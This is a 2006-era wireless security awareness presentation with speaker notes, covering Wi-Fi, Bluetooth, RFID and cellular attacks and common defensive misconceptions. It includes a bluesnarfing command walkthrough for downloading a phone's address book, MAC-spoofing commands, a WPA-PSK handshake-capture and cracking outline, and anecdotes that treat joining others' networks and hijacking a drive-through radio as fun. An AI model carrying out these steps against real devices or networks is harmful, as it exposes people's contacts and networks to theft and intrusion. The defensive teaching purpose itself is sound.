Wireless Network Security? doc

Wireless Network Security?Author: Paul Asadoorian, GCIA, GCIH Contributions by Larry Pesce, GCFA, GAWN PaulDotCom http://pauldotcom.com 1Many are aware that wireless networks, given the

Wireless Network Security?

Author: Paul Asadoorian, GCIA, GCIH Contributions by Larry Pesce, GCFA, GAWN

PaulDotCom http://pauldotcom.com

1Many are aware that wireless networks, given their open nature, are not secure Some may take precautions, such as running WEP, using a VPN, and using the newer WPA standards This presentation aims to raise awareness about attacks that are not easily detectible or preventible on most wireless networks today

This is not a “0day” presentation, there are no “new” attacks, merely demonstrations of existing attacks in different scenarios In fact, the attacks presented in this paper are from research that was done as long as a year ago, with the newest “attack” being presented in early 2006

It is not the goal of this presentation to tell you not to use wireless networks, but make you aware of the risk so you can make informed decisions about your usage of wireless technology and do everything possible to protect your organization’s network infrastructure, data, and integrity of its client computers

• Why wireless security is increasingly important

• Wireless security misconceptions

• Wireless Attacks

- Detection & Prevention

• Defensive Wireless Computing

2The roadmap for this presentation will first stress the importance of wireless security today Wireless technology is increasingly everywhere and in everything We will then attempt to debunk some of the common wireless security misconceptions To further stress the vulnerabilities in wireless networks three attacks will be discussed, demonstrated, and ideas for detection and prevention presented Finally we will turn our attention to practical ways in which to *try* to secure your wireless computing environment

Warning:Wireless Network

May Become Unstable

3Just a warning (We have permission to perform attacks against the wireless network and clients and will do so in a

responsible manner)

• New standards such as MIMO

(802.11n) will allow for 108Mb

4Linksys has popularized the wireless networking at home experience by marketing cheap and easy to setup wireless hardware In today’s market most laptop computers come with a wireless card built-in, including Apple and Wintel This makes it easy to setup wireless in the home, all you need is a $39 device, and whamo, you are now a Wifi household

One of the drawbacks to wireless networks is speed, it is not as fast as plugging into the wire However, new standards are looking to solve this problem by offering speeds comparible to the wired ethernet What does this mean? In the home, there will be little incentive to run expensive cables, which means more people will migrate to wireless

The Linksys WRT54G is the swiss army knife of Wifi, you can add battery packs and all sorts of other fun stuff (some of which you will see in this presentation) A battery pack lets you take your AP where ever you want to go

Take Your AP With You!

5We’ve estimated that you can get 3.5 hours with 8 AA batteries

Resources:

http://www.ck3k.org/gal/wrt/ - “Linksys WRT54G Battery Power Guide”

Depicted here are wireless extensions for you TV (to get a wireless HD signal or display pictures on your TV) and your refrigerator, you know, so you don’t miss your favorite show while cooking or grabbing a snack.

Wireless In Cell Phones

• Useful to drain battery

• Imagine 802.11n on a cell phone!

• Kind of a cool thing in a pinch

- Best Buy

- Emergency War Driving

7Cell phones are now featuring wireless technology, allowing you to browse the web and check email wherever you can find a hotspot (we’ll discuss hotspots a little later on) This technology is useful to drain your battery, and 802.11n isn’t going to help things (in fact, I envision flames shooting out of the early models) It does come in handy:

- While standing in Best Buy one day I notices that they had a bench of computers setup, most looked like customer computers being worked on by the crack team called “Geek Squad” I also noticed that they were plugged into WRT54G devices, which also means I smelled an open Wifi

network So while waiting, impatiently, I decided to conduct an experiment I fired up the Wifi on my phone and saw the wireless network “best buy” and “geek squad” I connected to the “geek squad” open SSID, and bam I had an RFC1918 address I didn’t go any further, but you can use your imagination from here

- Sometimes I get really bored on my drive home from work and I feel the need to do a war drive I don’t always have all my war-driving gear on board, so for a quick fix I enable Wifi on my cell I am still entertained by some of the SSIDs that I find, such as one near my house labeled

“redneckheaven” (Insert dueling banjos music here)

Takes Cool Pictures Too

8This page left intentionally “W00T”!

Wifi Everywhere: FON

• “Global hotspots” allow members to access open

wireless networks

• Most do not provide encryption

• Three different access models:

The concern with FON, and other setups, is that they typically do little to secure the wireless network This leaves you, and anyone connecting to you, vulnerable to attack

FON also uses a modified Linksys WRT54G wireless router

Wifi Everywhere: Open

Hotspot

• WRT54G-based Wifi Hotspot distros:

- EWRT - http://www.portless.net/menu/ewrt/

- Chillispot - http://www.chillispot.org/ - Runs on OpenWRT

- WifiDog - http://www.wifidog.org/ - Also runs on OpenWRT

10There are many other open source projects which implement the “captive portal” technology to create an open wireless network The above three also run on a WRT54G wireless router, with EWRT even having its own firmware that you install directly on the router Chillispot and Wifidog run

on OpenWRT (http://www.openwrt.org), which is a very popular, open-source, operating system designed specifically for the WRT54G platform

The basic premise is that you run an open wireless network Once a client connects to the network they get an IP address from DHCP When the user opens a web browser they are automatically taken to a login page no matter which web site they enter in the URL bar of the web browser This can be accomplished in a few different ways, such as DNS cache poisoning and destination NAT’ing

Add Gigantic Antennas!

Wireless for the whole neighborhood

11There are many different antenna hacks for the WRT54G, for more information on building antennas see:

http://www.wifi-toys.com/wi-fi.php?a=about&f=toc - Many sample chapters from the “Wifi Toys” book on this site Includes excellent information on how to build your own cables and antennas

It threatens your ISPs

business model

• Sharing your Internet connection cuts into ISP

profits (They hate it when that happens)

• Cox, local ISP, recently notified all customers

about the dangers of open WiFi:

“Our installers enable these built-in security features (like SSID and WEP encryption)”

- Read more at http://cox.com/takecharge/wi_fi.asp

12We’ve all done it at one point or another, connected to someone else’s wireless network to use the Intenret (somes not even on purpose!) So why purchase your own Internet connection when you can just use someone elses? ISPs obviously have a huge problem with this, and some, as seen above, put forth marketing campaigns that are aimed at people’s security fears In reality, they are trying to save their business

If they truly cared about security they would not offer “SSID” and “WEP” as potential security measures

• Build your own antenna to increase wireless range

• Requires tools, mechanical skills

• Chili & Pringles cans are most popular

- Who wants to eat an entire can of Chili anyway?

http://www.turnpoint.net/wireless/cantennahowto.html

Nobody is safe in my

neighborhood

13Antennas are fun, cheap, and easy to make They can really boost signal so you can pickup your neighbors Wifi from afar

For the

Anti-do-it-yourselfer

CompUSA brand 9Dbi Antenna for

Linksys WRT54G - $50

12Dbi “Wireless Garden Super

Cantenna Wireless Network Booster

Antenna” - $50

9 Dbi Directional Indoor Antenna - $30

14You can buy RF antennas very cheap now It was almost a year ago that I started seeing high gain antennas for sale at CompUSA, now the

selection is quite vast Just go to www.compusa.com and search for “antenna”

A 12Dbi antenna from CompUSA is now just $50

From www.netgate.com, you can get a nice indoor/outdoor Yagi antenna for $30

More Wireless Technologies

• Thats just why WiFi needs to be secure

Taco Bell Takeover

“Taco Bell Takeover After weeks of messing with the frequencies of a nearby Taco Bell, we decide to film ourselves messing with ourselves Just so we could witness the employees reactions to the prank RBCP and a neighbor of his drove to Taco Bell to place an order while RijilV and Is0tek stayed behind to mess with their order.”

http://phonelosers.org/tv/tacobell/

16

As wireless becomes more popular, so do opportunities for hacking In the above example a team of hackers hijack a Taco Bell drive-through and inject audio into the drive-through radio system There are many funny moments, such as when the manager comes out and scours the parking lot looking for the offenders stating, “They have to be within 50 feet!”

• Bluetooth suffers from

many insecurities as well

• Widely available on cell

phones, mice, and

http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/

* Bluetooth wireless IDS was invented after developers grabbed a list of a CEOs contacts using bluetooth hacking tools

For the mechanically inclined

not-so-• Bluetooth can go far despite popular

belief

• They even make a Bluetooth dongle

with an external antenna! ($40)

• Or go extreme!

- http://www.wardrivingworld.com

18Bluetooth devices use the same spectrum (2.4GHz) as Wifi, and therefore all of the antennas, and antenna building techniques, and similar The cost of these devices is steadily dropping CompUSA (in all its glory) offers a $40 USB dongle with a built-in antenna

For more extreme bluetooth goodness, you can go to www.wardrivingworld.com and pick up +12dBi antenna kits for around $140

• Bluetooth relies on a pin to provide security

- Typically the default is “0000”

- I think that was the combination to my luggage (I

changed it from 1234)

• There are numerous tools and attacks that allow you to:

- Download address book

- Change address book

- Delete address book

- Make phone calls

- Listen to phone calls

19Somehow, somewhere along the line, it was thought that a “pass key” of “0000” was some kind of security measure Granted, it would be difficult

to enter even an 8 character, upper/lower case, mixed with letters and numbers password into a bluetooth headset

Bluesnarfing can be a dangerous attack A particular person’s cell phone call history or address book could be useful information, especially if it is the CEO’s cell phone

Its Easy!

• All you need is

- Laptop with CD-ROM

- A USB Bluetooth dongle

- Auditor boot CD

• Then go download the following tutorial:

- http://irongeek.com/i.php?page=videos/bluesnarf1

20Attacking bluetooth devices is quite easy The above video tutorial is very good, and shows you all the commands you will need:

hciconfig hci0 - Similar to “ifconfig” but for bluetooth devices.

rfcomm bind /dev/rfcomm0 00:0F:DE:CF:4D:D7 1 - Binds rfcomm manually to your bluetooth adapter on channel 1.

rfcomm connect /dev/rfcomm0 00:0F:DE:CF:4D:D7 10 - Connect to a bluetooth device connected to your computer.

hcitool scan hci0 - Lists the available bluetooth devices in range, including the MAC address.

bluesnarfer -i -b <MAC> - This lists information about available bluetooth devices

bluesnarfer -r1-100 -b <MAC> - Downloads the first 100 phone book entries.

The hciconfig tool is useful to see the state of your bluetooth devices hciconfig hci0 reset is useful too, as sometimes bluesnarfer or btscanner

will leave your bluetooth device in a “funky” state (no, not Rhode Island either)

To make bluesnarfer work with the default code:

1 no entries in /etc/bluetooth/rfcomm.conf - bluesnarfer will do everything you need

2 mkdir -p /dev/bluetooth/rfcomm

3 mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

4 run bluesnarfer

5 profit?

Fun With Bluesnarfing

21Above you can se some of the bluesnarfing tools in action

More fun bluetooth tools

• btscanner - “Kismet-like” interface for scanning the

air for bluetooth devices

- Denotes which phones are vulnerable and what they are

vulnerable to

• Car Whisperer - Allows you to inject and/or record

audio on certain bluetooth devices

- Headsets

- Bluetooth enabled cars

22btscanner is a great tool that will look for all bluetooth devices in range You can often see all sorts of information about that device, such as make/model, the “name” string (which sometimes leaks even more information about the device, such as

“Jeff’s Phone”, and whether or not it is vulnerable to bluetooth attacks In that respect, its almost like a bluetooth vulnerability scanner.

Car Whisperer is an attack suite which allows you to scan for vulnerable bluetooth devices and inject audio Some cars have integrated bluetooth, which could allow an attack to inject audio into the car! This also works with some model bluetooth

headsets See the following links for more information:

http://trifinite.org/trifinite_stuff_carwhisperer.html

http://www.digitalmunition.com/HijackHeadSet.txt

Bluetooth Demo

23

“All you bluetooth are belong to us”

Well, not really, but it sounds cool :)

• Redfang - Allows you to brute force the MAC

address to find non-discoverable devices

• T-BEAR - The Transient Bluetooth Environment

AuditoR allows for the same

• WRTSL54GS - Linksys WRT54G with a USB port

- http://forum.openwrt.org/viewtopic.php?id=1650 - Support for

Bluetooth

- Fun possibilities

More fun bluetooth tools

24Redfang is an interesting tool It tries to solve the MAC address problem by brute forcing the 48-bit mac address Not the most efficient solution, but if you are more patient this is an option This tool will find devices that are not in discoverable mode

T-BEAR is another bluetooth hacking suite, simliar to bluesnarfer and redfang

The WRTSL54GS presents a potential platform for bluetooth hacking because it provides a USB port THe bluez bluetooth linux drivers have been ported to OpenWRT, so look for good things to come

• Radio Frequency IDentification

• Anyone who has ever bought

clothing experienced RFID

• Most operating in the 13.56MHz

passports, and even humans are using RFID as a method of identification

Below are some RFID resources:

RFID Reader Setup

26Cloning attacks have been demonstrated at The Sixth HOPE hacker conference and Defcon 14 Passport RFID was cloned at the recent Defcon conference, and while the usefulness of the attack is under some debate, the ability to clone RFID has proven to be a security risk

Sniffing RFID to gather sensative data is another attack vector Just as in wireless networks, data is transmitted for all to see

DoS attacks are nuicance in any environment, especially RFID

Manipulation of data in transit could be used by an attacker for a profitable gain at the cash register New technology that puts RFID in your ATM card could be manipulated so that your $350 purchase looks like $3.50

RFID Security Implications

• RFID is commonly used for physical security, such

lock clicks We walk in and find Van Bokkelen waiting

"See? I just broke into your office!" Westhues says

gleefully "It's so simple."

27The above is a scenario where the ability to read and playback RFID can be used to gain physical access to a facility Think of just how many RFID cards you could read in a busy coffee shop just outside a large corporation

While most hackers prefer to stay behind the keyboard, this attack becomes scary as this technology becomes more prevalent and easy to use

RFID Car Hacking

“Stealing” a car with RFID

28This team of RFID hackers used their knowledge to clone the RFID chip in a car key In order for this car to start you must send the correct signal over RFID in addition to having the key Armed with a copy of the key and an RFID reader/transmitter they are able to start the car with the cloned key and RFID signal

While you still need the key for this attack to be successful, it shows that the extra layer of defense did little to stop these attackers

Cellular Internet

• EVDO, Cingular EDGE, etc

• Hacks are certain to come, however hardware is

expensive

- Wifi was the same way

• The following shows debug commands executing

“Engineering Mode” on PC 5220:

- http://www.evdoinfo.com/Tips/PC_5220/

Sniffing_Out_New_EVDO_Towers_with_a_PC5220_20050531297/

29Given the insecurities in 802.11 wireless networks many have chosen to go the cellular route EVDO is one of the better technologies It has good speeds, well supported on all major platforms, and works reliably (due in large part to Verizon’s coverage in many areas)

There are no widely known attacks against this technology, so you can feel pretty safe using it, even at a hacker conference like Shmoocon,

HOPE, or Blackhat There are some “hacks” for the cards, however we are not aware of anyone being able to sniff packets or launch attacks against the protocol

Wireless Security Is Increasingly Important

• Wifi is everywhere, hardware is cheaper

• Wifi is in everything, from cell phones, to appliances, no

shortage of devices to attack

• The popularity of Wifi hotspots is increasing, most do not

implement good security

• Wifi can travel long distances

• Bluetooth is becoming more ubiquitous and is vulnerable

to attack using readily available and cheap hardware

• RFID is everywhere, and people are working on hacking it

• EVDO is becoming more popular, and hackers are already

taking an interest

30

• “Mac address filtering keeps most people out”

• “WEP is better than nothing”

• “I use WPA-PSK now, so I’m secure”

• “VPNs will protect me”

• “Nobody will find my wireless network”

Wireless Security

Misconceptions

31Above are what I believe to be the most common 5 wireless security misconceptions Now, some wireless security is better than none, so don’t feel as though you shouldn’t use the above technologies However, be aware of the risks and plan your wireless network security strategy

accordingly, balancing risk with convenience I hope to help you achieve a better balance by speaking about the risks

“MAC address filtering keeps most people out”

• Mac addresses of the clients can be observed

without associating to an AP

• Changing your own Mac address is easy

• Many utilities exist to do this

• A simple perl script makes it easy:

- http://www.michiganwireless.org/tools/sirmacsalot/

- http://aspoof.sourceforge.net/ (OS X tool)

- http://www.klcconsulting.net/smac/ (Windows Tool)

32Attacking a wireless network that uses MAC address filtering for security is pretty easy MAC addresses of valid hosts can be observed on the network by anyone with a wireless sniffer in monitor mode Utilities to aid in the process have even been developed

• Kismac is a PPC OS X application that lets you sniff wireless

networks in monitor mode Kismet, is the Linux alternative

• No support for OS X on Intel for Kismac!

• This allows you to see the valid MAC addresses on the network

• Kismac/Kismet Demo

“MAC address filtering

keeps most people out”

33

Even Works in OS X

• aspoof is a utility to change your MAC address in

OS X

- http://aspoof.sourceforge.net/

• Kind of scary to run, but it works:

root#: kextunload /System/Library/Extensions/

AppleAirPort2.kext/

root#: aspoof /System/Library/Extensions/AppleAirPort2.kext/ Contents/MacOS/AppleAirPort2 /var/root/latest_working_file 00:11:22:33:44:55

root#: kextload /System/Library/Extensions/

AppleAirPort2.kext/

34Even OS X has ready-made utilities for changing ones MAC address

“WEP is better than

“WEP is better than

nothing”

• All software tools required are on a bootable Linux

CD

• Whax and Auditor merged to create “Backtrack”

- Demo uses Auditor

• Then all you need is a laptop with a wireless card

36Backtrack is now the official distrobution of choice that has replaced Auditor and Whax and can be downloaded from http://www.remote-exploit.org/index.php/BackTrack

The wireless card of choice for most attacks is the Senao 802.11b card from www.netgate.com

“WEP is better than

“I use WPA-PSK, so I’m

secure now”

• WPA-PSK protected networks are vulnerable to

dictionary attacks

- This now works with WPA & WPA2 (802.11i)

• New attack techniques have increased the speed

• Spoof the Mac address of the AP and tell client to

disassociate

• Sniff the wireless network for the WPA-PSK

handshake (EAPOL)

• Run CowPatty against packets to crack the key

- Needs SSID to crack the WPA-PSK, easily obtainable!

- Also supports WPA2-PSK cracking with the same precomputed tables!

“I use WPA-PSK, so I’m

secure now”

39The attack against WPA and WPA2 is a dictionary brute force against the passphrase You first need to capture the packets containing the hash

In order to do this you need to be able to see the EAPOL handshake, which is accomplished by spoofing a disassociation packet to the client, from the access point The client will then reconnect and the handshake can be captured Then you use the CowPatty tool to perform the dictionary attack You will also need the SSID value

• The Church of Wifi released research to improve this

process at Shmoocon 2006

- Presentation: http://shmoocon.org/2006/presentations/SHMOOCON.odp

- Video: http://shmoocon.org/2006/videos/ChurchOfWiFi.mp4

http://wigle.net/ and used a 170,000 word dictionary

- DEFCON 14 saw the release with 1 million word dictionary

keys/sec instead of just 12 keys/sec

“I use WPA-PSK, so I’m

secure now”

40Using rainbow tables the Church of Wifi was able to greatly increase the effectiveness of this attack They also populated the attack tool with a large list of SSIDs in order to make this attack easier to run against random networks

A presentation at Blackhat 2006 improved upon this further, using FPGA’s to gain even more speed which resulted in almost realtime WPA-PSK cracking Unfortunatley the FPGA’s used at DEFCON 14 cost nearly $40K